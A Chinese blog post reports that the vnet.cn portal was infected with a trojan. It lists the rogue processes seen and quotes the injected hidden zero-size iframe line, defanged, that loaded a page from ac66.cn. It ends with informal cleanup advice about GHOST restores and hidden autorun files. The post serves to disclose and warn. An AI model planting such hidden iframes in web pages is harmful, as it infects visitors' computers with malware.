雨豪网络8月21日凌晨零时独家报道
本人向来有喜欢闲逛的习惯,一觉醒来就0:10左右来,无聊之中就想去互联星空网站看在线电视。
谁知道一打开互联星空总站(htp://www.vnet.cn),只见几个窗口一闪而过,凭着本人6年的计算机资历,感觉就是不对,马上打开“任务管理器”查看,只见多出了4进程,分别是NTDHCP.EXE,LSASS.EXE,PP4.EXE,SVCH0ST.EXE.
我马上查看互联星空总站的网站html代码(本人学习网站制作4年有余,对HTML代码也算了解),发现在互联星空总站的弹出窗口代码有问题(链接地址htp://www.vnet.cn/node/mesgsp.htm),之中有一段
<–frame src="htp://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="–>
学过网页编辑的应该都知道意思。原来是互联星空总站被人挂了木马。

以下为本人抓的现场图片:

此为互联星空总站弹出窗口

此为互联星空总站主页

放置的木马源地址


此木马网页内的CNZZ的统计代码

应急处理方案,请务必用GHOST恢复两遍,GHOST恢复以后删除D盘根目录下autorun.INF和command.EXE文件,删除以后再用GHOST再恢复一遍。
(应该此木马程序会自动复制文件,中毒以后你删除了这2个文件根本没用,GHOST恢复后D盘又会生成这2个文件,这2个文件为系统隐藏文件,切记切记)
注:为了安全帖子中已将http协议改为htp

转载请注明出处,任意转载! 雨豪网络

 

 


本文章由雨豪博客撰写,采用CC授权分享,转载时请注明原文链接。
本文链接: http://www.wx35.cn/archives/35/

随机文章

Comments

2 Responses to “[独家报道]中国电信下属网站互联星空总站被人植入木马!”

  1. 3d中后付款 on 六月 2nd, 2009 8:22 下午

    好啊,不错啊,,,

  2. 也許 on 九月 4th, 2009 4:15 下午

    到底還是管理員厲害呢
    GHOST恢复两遍~